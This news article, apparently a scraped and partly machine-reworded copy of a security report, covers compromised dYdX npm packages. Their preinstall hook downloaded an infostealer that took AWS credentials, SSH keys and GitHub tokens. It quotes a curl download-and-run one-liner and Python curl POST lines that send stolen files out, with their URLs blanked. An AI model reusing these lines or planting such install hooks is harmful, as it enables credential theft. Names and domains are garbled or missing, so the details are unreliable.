Npm Packages Used By Compromised Crypto Exchanges


Several npm packages released by crypto exchange, dYdX, and used by at least 44 cryptocurrency projects appear to have been compromised.

Powered by the Ethereum blockchain, dydX is a decentralized exchange offering perpetual trading options for over 35 popular cryptocurrencies, including Bitcoin (BTC) and Ether (ETH). At the time of writing, we have observed that the average daily trading volume of the platform has reached $1 billion.

– Advertising –

The packages in question were posted from the npm account of a dYdX staff member and contain malicious code that would execute information thieves on a system once installed.

npm packets used by compromised cipher exchange

security researcher Maciej Mensfeld from software supply chain security firm Mend and creator of, reported encountering multiple npm packages that were compromised and secretly installed information thieves.

The packages in question, pictured below, appear to have been published from the npm account of an employee of the dYdX encryption platform, BleepingComputer observed, although the exact cause of the compromise remains to be determined:

  1. @dydxprotocol/solo – versions 0.41.1, 0.41.2
  2. @dydxprotocol/perpetual – versions 1.2.2, 1.2.3

An earlier advisory claimed that the ‘@dydxprotocol/node-service-base-dev’ package was also affected, but it has since been removed.

BleepingComputer observed that the compromised version 0.41.1 of the ‘solo’ package was still active on npm at the time of writing:

compromised version of solo npm package
Compromised version of npm ‘solo’ package (Computer Beep)

These packages constitute the “Ethereum Smart Contracts and TypeScript library used for the dYdX solo trading protocol”.

The solo package, for example, is used by at least 44 GitHub repositories across multiple crypto platforms. GitHub README for “solo” and “perpetual” states “currently used by”

Fake ‘Circle’ CDN domain used to steal AWS IAM credentials, SSH keys and GitHub tokens

Mensfeld shared the problematic piece of code injected into the manifest file of the ‘solo’ package, for example.

As soon as the ‘solo’ package is installed, a preinstall the script would trigger, downloading and executing the contents of the ci.js JavaScript file hosted on

malicious line of code
Malicious line of code buried in package.json manifest file (Computer Beep)

Public domain records viewed by BleepingComputer indicate that “” was registered quite recently, September 14th.

The domain name and the use of “ci.js” in the malicious file name are likely the threat actor’s attempts to impersonate CircleCI, a CI/CD (continuous integration) software development platform and continuous delivery). On the other hand, the official CircleCI API is hosted by Cloudflare and accessible on

“Looking at the diff here… a preinstall has been added,” Mensfeld wrote in a GitHub issue alerting the dYdX community after no chance to reach the platform.

“But this script contains code that appears to be malicious… It appears to steal credentials and other secrets,” the researcher explained.

BleepingComputer observed that the ci.js script pulled by compromised versions, as shown below, downloads and runs yet another Python script,

curl –output >> /dev/null 2>&1 && python3 && rm

It is this “” with the information theft code that exfiltrates the IAM credentials of the victim’s Amazon AWS instance, among other secrets.

The IP address 169.254.xx shown below, which the malicious code connects to, is the result of a feature called Automatic Private IP Addressing (APIPA).

APIPA is invoked when a computer configured to obtain an automatic IP address via DHCP is unable to do so from the DHCP server.

Documents published by Amazon AWS show how this IP address is relevant in the larger IAM context.

infostealer exfiltrates IAM credentials
infostealer script exfiltrates IAM credentials (Computer Beep)

Additionally, the code steals the user’s GitHub tokens, SSH keys, environment variables, as well as the external IP address.

The stolen data is then uploaded to the same domain:

subprocess.getoutput(“curl -X POST -F ‘uploaded_file=@” + filename2 + “’ -F ‘submit=Upload’”)
subprocess.getoutput(‘curl -X POST -d “textdata=” + allen + “”’)

BleepingComputer observed that the malicious code is strikingly identical to that seen in the past, involving the malicious Python “PyGrata” packages which also stole the victim’s AWS credentials, environment variables, and SSH keys.

dYdX Chief Architect Brendan Chou thanked Mensfeld for promptly reporting the compromise and confirmed that “all [compromised versions] have been removed except solo@0.41.1″, attributing this to what appears to be “a temporary oversight” on npm’s part.

BleepingComputer contacted dYdX via email and Twitter prior to publication, to better understand the impact and scope of this compromise.

Although we have not yet received a response, the company confirmed that the incident had no impact on its websites, applications, smart contracts or funds, and that it plans to publish a post-mortem report on the incident:

This incident follows last year’s hack of popular npm libraries “ua-parser-js”, “coa” and “rc”, which were riddled with crypto-miners and password stealers. Just a few weeks ago, PyPI packages were hacked following a phishing campaign targeting developers.

Such threats to the software supply chain in recent times have prompted major open source registries like npm and PyPI to mandate two-factor authentication for maintainers of the most widely used libraries.

Update September 24, 2022 1:14 PM ET: Added a statement from dYdX posted on Twitter.

We would like to thank the writer of this article for this remarkable web content

Npm Packages Used By Compromised Crypto Exchanges

We have our social media profiles here and other pages on related topics here.